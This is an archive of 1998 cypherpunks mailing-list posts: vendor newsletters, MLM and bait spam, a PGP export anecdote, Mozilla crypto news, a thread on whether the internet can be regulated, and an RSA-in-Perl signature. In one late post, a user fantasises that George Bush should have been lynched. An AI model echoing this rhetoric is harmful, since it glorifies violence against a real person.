Message-ID: <199804021411.GAA01757@toro-cm3.verisign.net>
MIME-Version: 1.0
Content-Type: text/plain


Dear VeriSign Digital ID Holder:
 
We hope that you have been enjoying the security and convenience of your Trial Digital ID. 

As you may know, many popular e-mail packages now support secure e-mail using Digital IDs.  If you haven't already started securing your e-mail, please visit http://www.verisign.com/securemail/guide to walk through our step-by-step Secure E-mail Guide.

When you're ready to start sending secure e-mail, you'll want to build your address book of business associates and friends with whom you can exchange encrypted messages.  Please visit http://www.verisign.com/smime/network to start building your Secure E-mail Network now.

Thank you for choosing VeriSign! We look forward to serving your future electronic commerce and communications needs.
 
VeriSign Customer Service




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Law, Mark" <MLaw@extensis.com>
Date: Thu, 2 Apr 1998 14:01:43 -0800 (PST)
To: "'news-l@smeg.extensis.com>
Subject: Ten New Reasons to Visit Extensis Online
Message-ID: <8A30B9E165B2D111B90A00104B233F7905A766@extensisnt.extensis.com>
MIME-Version: 1.0
Content-Type: text/plain


news@extensis.com
===============

Ten New Reasons to Visit Extensis Online

http://www.extensis.com

	Public Beta of PhotoAnimator Announced / Win Every Extensis
Product--$2000 Value!                                    
	Soar to New Heights with Version 2.0 of Preflight Pro and
Preflight Designer                                       
	Cross-platform Upgrade of BeyondPress Scheduled for Release in
June
	Extensis PDF Pavilion Shows First Ever PDF Workflow

	Create Stunning Visual Effects for Images with PhotoFrame 1.0
for Adobe Photoshop                                                
	 Intellihance Offers Support for Leading Graphics Applications

	 Award-winning Masking Tool, Mask Pro, Does Windows

	Extensis Corporation and Astrobyte LLC Jointly Announce Merger
Agreement                                       
	Free QuarkXPress 4.0 Compatibility Updates Available from Web
Site                                      
	PowerSuites Available for Creative Professionals
************************************************************************
********************************

EXTENSIS PHOTOANIMATOR ANNOUNCED...GIF ANIMATION CONTEST FOR OVER $2000
OF EXTENSIS SOFTWARE
Extensis PhotoAnimator has revolutionized the creation of animated GIFs
for the Web. With its animation effects, timeline sequencing and size
optimization, Extensis PhotoAnimator is the only affordable,
full-fledged animation package built for the needs of Web designers.
Download your Public Beta now!
http://www.extensis.com/products/PhotoAnimator/beta.html
Once you have your copy of PhotoAnimator, create a compelling Animation
and submit it to Extensis to qualify to win over $2000 worth of Extensis
software. Send your name, address, phone number and animation in GIF
format to: animatorcontest@extensis.com
SOAR TO NEW HEIGHTS WITH VERSION 2.0 OF EXTENSIS PREFLIGHT PRO AND
PREFLIGHT DESIGNER
Version 2.0 of Extensis' preflight solutions feature additional host
application support for Adobe PageMaker, Illustrator, Photoshop,
Macromedia Freehand, Multi-Ad Creator, as well as PDF Integration, tools
to automate the preflight process, OPI support and significantly faster
processing power. Extensis Preflight products ensure that preflight is
done right and will save you time and money.
http://www.extensis.com/press/980316b.html
CROSS-PLATFORM UPGRADE FOR BEYONDPRESS SCHEDULED FOR JUNE
Following its recent merger with Astrobyte LLC, Extensis will release
BeyondPress 4.0 for QuarkXPress. Version 4.0 will feature Macintosh and
Windows support, DHTML positioning and include Extensis PhotoAnimator, a
robust GIF animation tool. Upgrades will be available free to registered
owners of BeyondPress 3.0 from the Extensis Web site. 
http://www.extensis.com/press/980316a.html
EXTENSIS, INDUSTRY LEADERS SHOW FIRST EVER PDF WORKFLOW AT SEYBOLD
Extensis and PDF innovators Adobe, AGFA, Apple, Creo, Scitex, Tektronix
and Graphic Arts Center showcased their expertise at the Extensis PDF
Workflow Pavilion during Seybold Seminars, New York. For the first time,
interactive Portable Document Format (PDF) workflows were demonstrated
through a multi-vendor digital imaging system. 
--Check out the online version of the PDF Pavilion and enter to WIN
Extensis Preflight Pro.
http://www.extensis.com/press/980310.html
CREATE STUNNING EDGE EFFECTS FOR IMAGES WITH PHOTOFRAME
The cross-platform Extensis PhotoFrame for Adobe Photoshop allows users
to create an unlimited number of spectacular frames and border effects
for their images. By providing unlimited creative control, real time
previews and interactive settings, PhotoFrame enables users to develop
customized, professional-quality image frame and border effects in a
fraction of the time it takes to accomplish manually. Users can purchase
PhotoFrame 1.0 with Volume 1, Painted Edge Effects, and/or Volume 2,
Digital Edge Effects. Each volume contains over 150 professionally
designed frames.
http://www.extensis.com/press/980217.html
INTELLIHANCE 3.02 ADDS SUPPORT FOR LEADING GRAPHICS APPLICATIONS
Latest version of popular image enhancement software features additional
support for Adobe PhotoDeluxe 2.0 for Windows and Macintosh and Corel
PHOTO-PAINT 8.0 for Windows. Functioning as a plug-in that provides
intelligent one-click image optimization, Intellihance 3.0.2 is now
compatible with Adobe Photoshop 3.0 and later, PhotoDeluxe 2.0, Live
Picture 2.6 for Macintosh and Corel PHOTO-PAINT 8.0 for Windows.
http://www.extensis.com/press/980202.html
MASK PRO FOR ADOBE PHOTOSHOP DOES WINDOWS
Delivering the same award-winning functionality available for Macintosh
users, Mask Pro for Windows 95 and Windows NT uses innovative Color
Matching Technology to provide the most sophisticated tool available for
masking images in Adobe Photoshop. Extensis Mask Pro makes the difficult
and time-consuming process of efficiently creating professional-quality
masks (isolating a particular portion of an image), that print
flawlessly, remarkably easy and efficient. 
http://www.extensis.com/press/980127.html
EXTENSIS AND ASTROBYTE LLC JOINTLY ANNOUNCE MERGER AGREEMENT
Extensis Corporation and Astrobyte LLC have announced a definitive
merger agreement. The combined companies will create a leader in
productivity software for creative professionals working in print,
electronic and Internet publishing.
http://www.extensis.com/press/980106a.html
QUARK 4.0 COMPATIBILITY UPDATES NOW AVAILABLE
Extensis' XTensions for QuarkXPress, Extensis QX-Tools 2.0.1, QX-Effects
3.0.1, Preflight Pro 1.0.3 and Preflight Designer 1.0.3, have been
upgraded and are free to registered owners. These software updates
feature compatibility with the recently released QuarkXPress 4.0 and are
available from the Extensis Web site at: 
http://www.extensis.com/products/download.html
POWERSUITES AVAILABLE FOR CREATIVE PROFESSIONALS
Extensis has created PowerSuites for QuarkXPress and Adobe Photoshop.
The Extensis PowerSuites, for QuarkXPress and Adobe Photoshop, each
contain three Extensis software titles, packaged together at an
affordable price. Extensis PowerSuites enable customers to use a wide
range of compatible tools designed to meet their unique requirements and
improve their productivity, while saving significantly off the retail
price.
http://www.extensis.com/press/980105a.html
=======================================================
news@extensis.com is distributed to customers of Extensis Corporation
and 
individuals who request the information. Please reply with any comments 
or suggestions you have about this news service. To unsubscribe please 
reply to this email with UNSUBSCRIBE in the first line of the response.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sunder <sunder@brainlink.com>
Date: Fri, 3 Apr 1998 08:15:10 -0800 (PST)
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: illegal export of pgp.zip by .mil
In-Reply-To: <v04003a3fb1497f8db95d@[139.167.130.246]>
Message-ID: <3523B87E.864C0CF9@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


Instead of making a fuss over this, we should thank the very wise and
very smart sysadmins at these .mil machines for providing this wonderful
service for us.  By making themselves look totally clueless, they've provided
for the spread of privacy and freedom of privacy!  That's truly commendable!

Personally, I will raise my next glass of beer in their honor!  :)  


Robert Hettinga wrote:
> 
> At 2:32 AM -0500 on 4/2/98, David Honig wrote:
> 
> >
> > http://braggbbs.bragg.army.mil/libs/utils.htm
> > has a link to ftp://bbs.bragg.army.mil/library/utils/pgp262.zip
> 
> This is really nothing new. My understanding is that when Kelly Goen posted
> the original PGP to USENET, he set the distribution to US only, or at the
> very least North America only.
> 
> However, some mis-configured news machine actually exported PGP to the rest
> of the world by ignoring the distribution request on those news messages.
> 
> The machine in question had a .mil domain name. :-).
> 
> Cheers,
> Bob Hettinga

-- 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ComPete@iname.com
Date: Thu, 2 Apr 1998 12:50:46 -0800 (PST)
To: cypherpunks@toad.com
Subject: FYI - PUBLIC NOTICE!!
Message-ID: <199804022050.MAA19592@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi 


	*    MARK YARNELL    *
	*    Pre-Launches    *
	*  his next BIG deal *



		21st Century Global Network, LLC
		**************************************

*	Mark Yarnell former NuSkin distributor
*	Upline magazine named Mark "The Greatest Networker in the World"
*	Inducted into the "Hall of Fame" last year.
*     	Earned hundreds of millions of  $$$  over the last few years.


		JOINS with


American Technology Group Inc, (ATG) with their patented proprietary 
IE(tm) Crystal technology once used in laundry cleaning products.

The IE(tm) Crystals will be used in a various range of personal &
home care products. 23 personal & home care products to start.

		and 

Integral Health Inc, a company comprised of 50 medical doctors
and health care specialists.

		to create

	the next $10 billion company.

Top Earners have already been on the first conference call, 
don't miss the next one. 

TONIGHT Thursday April 2nd  9pm EST.


*   	You must send your Phone & Fax number for Marks  
*	4 page Business Strategy and Conference Call schedule.

For More Information mailto:leipro@idt.net?subject=Mark_Yarnell
 

----------------------------------------------------------------
To be REMOVED mailto:Compete@iname.com?subject=REMOVE













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 2 Apr 1998 13:42:52 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: illegal export of pgp.zip by .mil
In-Reply-To: <3.0.5.32.19980401233224.007aacd0@otc.net>
Message-ID: <v04003a3fb1497f8db95d@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:32 AM -0500 on 4/2/98, David Honig wrote:


>
> http://braggbbs.bragg.army.mil/libs/utils.htm
> has a link to ftp://bbs.bragg.army.mil/library/utils/pgp262.zip

This is really nothing new. My understanding is that when Kelly Goen posted
the original PGP to USENET, he set the distribution to US only, or at the
very least North America only.

However, some mis-configured news machine actually exported PGP to the rest
of the world by ignoring the distribution request on those news messages.

The machine in question had a .mil domain name. :-).

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jennifer DePalma <jdepalma@cato.org>
Date: Thu, 2 Apr 1998 10:30:21 -0800 (PST)
To: cypherpunks@toad.com
Subject: regulating the internet
Message-ID: <199804021829.NAA20429@cato.org>
MIME-Version: 1.0
Content-Type: text/plain


Anyone have any opinions on the feasibility of regulating the internet?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevlar <kevlar@smartlink.net>
Date: Thu, 2 Apr 1998 13:45:17 -0800 (PST)
To: cypherpunks@toad.com
Subject: RE: regulating the internet
In-Reply-To: <6B5344C210C7D011835C0000F80127660100366A@exna01.securitydynamics.com>
Message-ID: <3.0.5.32.19980402133858.007ef420@mail.smartlink.net>
MIME-Version: 1.0
Content-Type: text/plain


Which rasies another issue...

I personally have always forseen the day when you will be charged by the
megabyte, and not the minuite. Picture this...

Your at the air port, and you need to see if a very important email has
arived... you walk to the nearest phone booth, which cosists of nothing
more than a little plastic booth for you to stand in, and an rj-11. No
handset, no keypad, no coin slot... just a jack. You take out your palmtop
computer, plug it into the jack, type in your password, download your
e-mail and attachments (about 7 meg in all, large attachments) and press
the Logoff button. A little window appears with the AT&T logo in the corner
and says:

Thank you for using AT&T for all your digital needs.
Total use: 7101k
Total charge: $0.71
$0.71 has been billed to your MASTERCARD.

Could you see ISP's and phone companys alike JUMPING on this?

There's a slew of questions that this raises... do you get charged for
uploading too? is it a different pricing system for uploading? do you get
charged less? more? is there such a thing as a free address, like our
present (800) or (888) numbers in which the recipiant picks up the tab? 

And most importantly... does it cost more to send your packet further away?
to another country?

I think I just slamed this idea into a virtual brick wall... Comments,
ideas, and criticisims are always welcome!


At 03:23 PM 4/2/98 -0500, you wrote:
>Your question is too vague to get any kind of simple answer.
>
>Regulate *what* exactly? Protocol standards? Pricing? Volume 

-Kevlar
<Kevlar@smartlink.net>

Oh, I'm sorry... Was I not suposed to EXPORT STRONG CRYPTO?
print pack"C*",split/\D+/,`echo
"16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|
dc`

Beat your algorithms into swords and your virtual machines into spears...
Let the weak say, "I am strong". 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ken Williams <jkwilli2@unity.ncsu.edu>
Date: Thu, 2 Apr 1998 11:21:01 -0800 (PST)
To: Jennifer DePalma <jdepalma@cato.org>
Subject: Re: regulating the internet
In-Reply-To: <199804021829.NAA20429@cato.org>
Message-ID: <Pine.SOL.3.96.980402142031.6466A-100000@c00069-100lez.eos.ncsu.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 2 Apr 1998, Jennifer DePalma wrote:

>Anyone have any opinions on the feasibility of regulating the internet?

no.

Ken Williams

ORG: NC State Computer Science Dept   VP of The E.H.A.P. Corp.   
EML: jkwilli2@adm.csc.ncsu.edu        ehap@hackers.com             
WWW: http://152.7.11.38/~tattooman/   http://www.hackers.com/ehap/ 
PGP: finger tattooman@152.7.11.38                       







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@alum.mit.edu>
Date: Thu, 2 Apr 1998 14:33:04 -0800 (PST)
To: Jennifer DePalma <cypherpunks@toad.com
Subject: Re: regulating the internet
In-Reply-To: <199804021829.NAA20429@cato.org>
Message-ID: <3.0.5.32.19980402143301.007baa20@otc.net>
MIME-Version: 1.0
Content-Type: text/plain


At 01:29 PM 4/2/98 -0500, Jennifer DePalma wrote:
>Anyone have any opinions on the feasibility of regulating the internet?
>

Read "Cyphernomicon".  Hard.




------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

When exponentiation is outlawed, only outlaws will exponentiate.










	















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: info@fsbowner.com
Date: Thu, 2 Apr 1998 10:35:59 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Electrical Substation Control Service
Message-ID: <199804021945.OAA23357@orion.icmiinc.com>
MIME-Version: 1.0
Content-Type: text/plain



Electrical Substation Controls:

Single Phase Tap Changing Transformer Controls.

With a 25 yr history, ICMI designed and mfg. McGraw CL1,2,2a,
CL4,CL5a. Expanded services now include Siemens/Allis IJ, MJ
and SJ series, and GE VR1 and ML32 Controls.  Servicing and
total rebuilds with 2 yr limited warranty.  ICMI is also 
intrested in buying the above controls for rebuilding.  

Contact Dirk K Mooibroek
 
Tel (513)752-4731 Fax (513)752-4738 Email info@icmiinc.com

Also visit our web site at http://www.icmiinc.com




This notice is intended for Power Utility Professionals.
If you feel you have been reached in error, or do not want to 
receive further notification of issues concerning the Power 
Utility Industry please send a message containing the word remove
in either the subject or body of the message to:

remove@icmiinc.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jennifer DePalma <jdepalma@cato.org>
Date: Thu, 2 Apr 1998 12:19:21 -0800 (PST)
To: cypherpunks@toad.com
Subject: regulating the internet -- clarification
Message-ID: <199804022018.PAA23047@cato.org>
MIME-Version: 1.0
Content-Type: text/plain


To clarify:  I'm serious about this question, if for no other reason than I
am editing a paper that basically claims it is impossible to regulate the
internet.  I wish that were true, but I'm not sure I buy it.  Any input is
most appreciated.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Trei, Peter" <ptrei@securitydynamics.com>
Date: Thu, 2 Apr 1998 12:21:31 -0800 (PST)
To: "'Jennifer DePalma'" <cypherpunks@toad.com
Subject: RE: regulating the internet
Message-ID: <6B5344C210C7D011835C0000F80127660100366A@exna01.securitydynamics.com>
MIME-Version: 1.0
Content-Type: text/plain


Your question is too vague to get any kind of simple answer.

Regulate *what* exactly? Protocol standards? Pricing? Volume 
of traffic? Traffic content? Internationally or domestically?
If domestic, which countries? Use of encryption? Anonymity?
Digital signatures? Taxation? Email content? Spam?  Porn? 
Usenet? Web sites? IRC? DNS naming services? Digital telephony?

Packets currently fly around the world as free as migratory
birds, and as hampered by borders.

Peter Trei
ptrei@securitydynamics.com
 

> -----Original Message-----
> From:	Jennifer DePalma [SMTP:jdepalma@cato.org]
> Sent:	Thursday, April 02, 1998 1:30 PM
> To:	cypherpunks@toad.com
> Subject:	regulating the internet
> 
> Anyone have any opinions on the feasibility of regulating the
> internet?
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Abstruse" <WebMaster@abstruse.ml.org>
Date: Thu, 2 Apr 1998 12:57:28 -0800 (PST)
To: Jennifer DePalma <jdepalma@cato.org>
Subject: Re: regulating the internet
In-Reply-To: <199804021829.NAA20429@cato.org>
Message-ID: <3523FB9F.3A46@Abstruse.ml.org>
MIME-Version: 1.0
Content-Type: text/plain


Jennifer DePalma wrote:
> 
> Anyone have any opinions on the feasibility of regulating the internet?

impossible..




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "T. Luv" <tluv@hsnp.com>
Date: Thu, 2 Apr 1998 14:01:22 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: cookbook
Message-ID: <001701bd5e84$27795900$bd6ebec7@default>
MIME-Version: 1.0
Content-Type: text/plain




this is in request to the 
anarchy cookbookk or the jollyrodger. i wantted to know if u could tell me where 
i can find either one or if u could send one of them to me.
 
alex  love
 
T LuvICQ #7624072<A 
href="http://www.sunridge.net/index.phtml?id=83091">http://www.sunridge.net/index.phtml?id=83091


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ken Williams <jkwilli2@unity.ncsu.edu>
Date: Thu, 2 Apr 1998 13:21:23 -0800 (PST)
To: Jennifer DePalma <jdepalma@cato.org>
Subject: Re: regulating the internet -- clarification
In-Reply-To: <199804022018.PAA23047@cato.org>
Message-ID: <Pine.SOL.3.96.980402161030.10822A-100000@c00069-100lez.eos.ncsu.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 2 Apr 1998, Jennifer DePalma wrote:

>To clarify:  I'm serious about this question, if for no other reason than I
>am editing a paper that basically claims it is impossible to regulate the
>internet.  I wish that were true, but I'm not sure I buy it.  Any input is
>most appreciated.

I am serious about my answer too.  My answer is "no".

To clarify:  I do NOT think it is feasible "to regulate the Internet".
The feds don't have enough clueservers to keep up with the technology and
the growth.  Only Fidel Castro could single-handedly regulate the
Internet, but he still doesn't have Internet access (besides that AOL
account), so that's a moot point.  Trying to "regulate the Internet" is
like the government trying to regulate an individual's bowel movements.
Ex-Lax does a better job, but still can't do it right.

Just say no to government sponsored prostate exams and body cavity
searches.

Ken 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Thu, 2 Apr 1998 16:27:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: Crytozilla operational 15 h after Netscape releases Mozilla source
Message-ID: <Pine.SUN.3.91.980402154857.26802B-100000@netcom5>
MIME-Version: 1.0
Content-Type: text/plain


In yet another painful blow against US export regulations, the
international Mozilla Crypto Group replaced the crypto code that US
regulations forced Netscape to remove before publication of the Mozilla
source. 

It took the group all of 15 hours to do so. This should make for a nice 
tidbit to be used in future depositions or testimony.

http://mozilla-crypto.ssleay.org/press/19980401-02/index.html

-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael H. Warfield" <mhw@wittsend.com>
Date: Thu, 2 Apr 1998 13:35:30 -0800 (PST)
To: ptrei@securitydynamics.com
Subject: Re: regulating the internet
In-Reply-To: <6B5344C210C7D011835C0000F80127660100366A@exna01.securitydynamics.com>
Message-ID: <199804022133.QAA29899@alcove.wittsend.com>
MIME-Version: 1.0
Content-Type: text/plain


Trei, Peter enscribed thusly:
> Your question is too vague to get any kind of simple answer.

	I thought her question was pretty specific and the simple answer
is yes.  She asked if anyone had any opinions.  I might have responded that
asking an opinionated bunch like cypherpunks if any of them have opinions
must have been a retorical question.

	I think we all have opinions on regulating the internet.  I
don't think the simple answer is what she WANTED though...  :-)

	Answering the question she ASKED is REAL SIMPLE.  Just like the
joke about Microsoft support...  The answer is 100% correct and completely
useless.  :-)

> Regulate *what* exactly? Protocol standards? Pricing? Volume 
> of traffic? Traffic content? Internationally or domestically?
> If domestic, which countries? Use of encryption? Anonymity?
> Digital signatures? Taxation? Email content? Spam?  Porn? 
> Usenet? Web sites? IRC? DNS naming services? Digital telephony?
> 
> Packets currently fly around the world as free as migratory
> birds, and as hampered by borders.
> 
> Peter Trei
> ptrei@securitydynamics.com
>  
> 
> > -----Original Message-----
> > From:	Jennifer DePalma [SMTP:jdepalma@cato.org]
> > Sent:	Thursday, April 02, 1998 1:30 PM
> > To:	cypherpunks@toad.com
> > Subject:	regulating the internet
> > 
> > Anyone have any opinions on the feasibility of regulating the
> > internet?
> > 
> 


-- 
 Michael H. Warfield    |  (770) 985-6132   |  mhw@WittsEnd.com
  (The Mad Wizard)      |  (770) 925-8248   |  http://www.wittsend.com/mhw/
  NIC whois:  MHW9      |  An optimist believes we live in the best of all
 PGP Key: 0xDF1DD471    |  possible worlds.  A pessimist is sure of it!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Oasis179 <Oasis179@aol.com>
Date: Thu, 2 Apr 1998 13:57:47 -0800 (PST)
Subject: Im Jenny
Message-ID: <c4bedeb.3524095f@aol.com>
MIME-Version: 1.0
Content-Type: text/plain

 


To: Oasis179@aol.com
Subject: Im Jenny
From: Oasis179 <Oasis179@aol.com>
Date: Thu, 2 Apr 1998 16:53:51 EST
Organization: AOL (http://www.aol.com)

Hi I'm Jenny and I made a webpage which has my picture on it, I think im very
pretty, tell me what you think.

Click Here




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Oasis179 <Oasis179@aol.com>
Date: Thu, 2 Apr 1998 14:37:47 -0800 (PST)
Subject: Im Jenny
Message-ID: <75c245d4.35240acb@aol.com>
MIME-Version: 1.0
Content-Type: text/plain

 


To: Oasis179@aol.com
Subject: Im Jenny
From: Oasis179 <Oasis179@aol.com>
Date: Thu, 2 Apr 1998 16:53:51 EST
Organization: AOL (http://www.aol.com)

Hi I'm Jenny and I made a webpage which has my picture on it, I think im very
pretty, tell me what you think.

Click Here




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James Lucier" <jlucier@atr.org>
Date: Thu, 2 Apr 1998 15:10:27 -0800 (PST)
To: "Ken Williams" <jdepalma@cato.org>
Subject: RE: regulating the internet -- clarification
In-Reply-To: <Pine.SOL.3.96.980402161030.10822A-100000@c00069-100lez.eos.ncsu.edu>
Message-ID: <001a01bd5e8c$1916d100$0f24eecf@jlucier.atr.org>
MIME-Version: 1.0
Content-Type: text/plain


Let's be fair to Jennifer: the Internet is a self-regulated community.  From
Netiquette to Protocols, there is actually quite a lot of regulation going
on.  However, for the most part, this regulation is voluntary:  you choose
to opt in, or in the case of Spamford Wallace, people ultimately choose not
to deal with you. They may even seek civil remedies in court. In this
respect, the Internet is a model for the self-regulating markeplace of the
future.

Is is possible to regulate the Internet?  You bet, but not in any
productive, useful way.  You want to regulate the Internet?  Just go to
France and try something called the Minitel.  It's a nice toy that some
people like to play with, but it is a closed-end system that does not have
the capacity to evolve, develop, and innovate the way the Internet does.

Encryption controls are a great example of the futility of attempting to
"regulate" the net.  As Adam Back delights in showing, you can write
powerful crypto in tiny little hacks of maybe 130 characters or so in perl.
These give you the ability to encrypt any size file with a key of abritrary
length.  Who are the feds kidding when they think that they can "stop"
people from doing this?

> -----Original Message-----
> From: owner-cypherpunks@cyberpass.net
> [mailto:owner-cypherpunks@cyberpass.net]On Behalf Of Ken Williams
> Sent: Thursday, April 02, 1998 4:21 PM
> To: Jennifer DePalma
> Cc: cypherpunks@toad.com
> Subject: Re: regulating the internet -- clarification
>
>
> On Thu, 2 Apr 1998, Jennifer DePalma wrote:
>
> >To clarify:  I'm serious about this question, if for no other
> reason than I
> >am editing a paper that basically claims it is impossible to regulate the
> >internet.  I wish that were true, but I'm not sure I buy it.
> Any input is
> >most appreciated.
>
> I am serious about my answer too.  My answer is "no".
>
> To clarify:  I do NOT think it is feasible "to regulate the Internet".
> The feds don't have enough clueservers to keep up with the technology and
> the growth.  Only Fidel Castro could single-handedly regulate the
> Internet, but he still doesn't have Internet access (besides that AOL
> account), so that's a moot point.  Trying to "regulate the Internet" is
> like the government trying to regulate an individual's bowel movements.
> Ex-Lax does a better job, but still can't do it right.
>
> Just say no to government sponsored prostate exams and body cavity
> searches.
>
> Ken
>
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Toto" <toto@sk.sympatico.ca>
Date: Thu, 2 Apr 1998 19:20:01 -0800 (PST)
To: "Jennifer DePalma" <cypherpunks@toad.com>
Subject: Re: regulating the internet
Message-ID: <004401bd5ebf$d7db9b60$0262a58e@uymfdlvk>
MIME-Version: 1.0
Content-Type: text/plain



-----Original Message-----
From: Jennifer DePalma <jdepalma@cato.org>
To: cypherpunks@toad.com <cypherpunks@toad.com>
Date: Thursday, April 02, 1998 11:24 AM
Subject: regulating the internet


>Anyone have any opinions on the feasibility of regulating the internet?


What is life?

[Please reply  by private, encrypted email--I plan to sell the answer by
email MLM.]







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Abstruse" <WebMaster@abstruse.ml.org>
Date: Thu, 2 Apr 1998 17:39:05 -0800 (PST)
To: James Lucier <jlucier@atr.org>
Subject: Re: regulating the internet -- clarification
In-Reply-To: <001a01bd5e8c$1916d100$0f24eecf@jlucier.atr.org>
Message-ID: <35243DBF.7B72@Abstruse.ml.org>
MIME-Version: 1.0
Content-Type: text/plain


James Lucier wrote:
> 
> Let's be fair to Jennifer: the Internet is a self-regulated community.  From
> Netiquette to Protocols, there is actually quite a lot of regulation going
> on.  However, for the most part, this regulation is voluntary:  you choose
> to opt in, or in the case of Spamford Wallace, people ultimately choose not
> to deal with you. They may even seek civil remedies in court. In this
> respect, the Internet is a model for the self-regulating markeplace of the
> future.


ok, fair enough..to actually regulate the internet would require a
"coming-together" of sorts by the major countries in the world..have
they been able to accomplish this as of yet? no..now, granted, there
could be possible laws, rules, etc made that would enforce (somehwat)
this policy in differnet parts of the world..but..eventually, there's
going to be some "stepping on toes" of one nation on another..or one
region on another..or whatever..it just won't "jive".

But, provided they did manage to pull a universal proposition off that
everyone could agree on..do you honestly believe the people that
actually know how to conrol/manipulate these sytems would allow it?
there're a lot more people that have the technical savvy that would
oppose that, than there are that would defend it..if you ask me..




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Toto" <toto@sk.sympatico.ca>
Date: Thu, 2 Apr 1998 19:57:31 -0800 (PST)
To: "Declan McCullagh" <declan@well.com>
Subject: The modem tax never left...
Message-ID: <004901bd5ec5$18730000$0262a58e@uymfdlvk>
MIME-Version: 1.0
Content-Type: text/plain


>From: Declan McCullagh <declan@well.com>
>To: politech@vorlon.mit.edu
>Subject: http://cgi.pathfinder.com/netly/opinion/0,1042,1869,00.html

The NotReally News ReportWhore informs us:
>        *  *  *
>       Is the "modem tax" back? FCC Commissioner Susan Ness said on
>   Monday that ISPs might have to pay so-called universal service charges
>   that help subsidize cheap rural phone service and school and library
>   Internet connections.

Declan,
Something that Republican children of the post-JFK generation all remember
is where they were when George Bush said, "Read my (moving) lips...No New
Taxes!"
The great tragedy of their times, though they still fail to recognize it
even today, is that the citizens present at that occassion did not rush the
stage and drag him to the nearest tree with a limb strong enough to hold his
weight when a rope was thrown over it and attached to his neck.

The sticky PrePubescizens of the WebGeneration will someday regret that
their parents stood by and didn't even bother watching as the Analogue Lies
of the Controllers were transformed into Digital Lies suitable for implant
into the brains of the Robotizens, via the infrared wave emission
capabilities of TeleTunnelVision and JavasCrapGraphics.

I know that you make your living in the Belly of the DCBeast, so you don't
want to slay the Monster Who Lays The Golden Eggs, but couldn't you at least
try to make sure that the Monster gets a little of the Bad Eggs it is
hurling at the Flockizens on its own face?

How about some headlines such as:
  "Lying Piece of DC Shit Claims Hands-Off Internet Policy"
  "Arrogant Thieves Expect Victims To Believe They Won't Shake Down
NetUsers."
  "Armed Terrorists Fake Retreat To Draw Victims Into Ambush."

>        *  *  *
>Some excerpts from Commissioner Ness' remarks:
>
> "Local telcos complain that data calls typically last much
> longer than voice calls, tying up switches and requiring
> the addition of more capacity in the loop and the central
> office.


And this is True (TM)?
Are there any real reporters left in the media who are capable of analyzing
the Claims (TM) being made by those promoting Facts (TM) meant to serve
their own-self interests?
(Not a 'crime', but neither should it be a 'gimme.')
Is their anyone in the techno-reporting industry who is capable of including
an analysis of the claims of various players in the game of  Buy The Pot?
Are any of those reporting on the
Telecos' claims capable of informing those with a limited knowledge of the
technology involved if the analog and digital signals being discussed are
comparable in terms of the 'burden' that they place on the Telecos, or if
InterNet service would be more efficient or competitive if put into the
hands of other communications infrastructures?

If the local Telecos are finding themselves 'burdened' by InterNet traffic,
then perhaps they should share that terrible burden with Cable Companies,
and other entities who would like a chance to compete for the InterNet
business which is currently in the dictatorial grip of the Regulators Who
Feed At The Teleco Trough.

I expect that I can find the answers to the questions I have about these
matters by reading a mountain of information from various sources, and then
distilling it down to manageable proportions suitable for analysis.
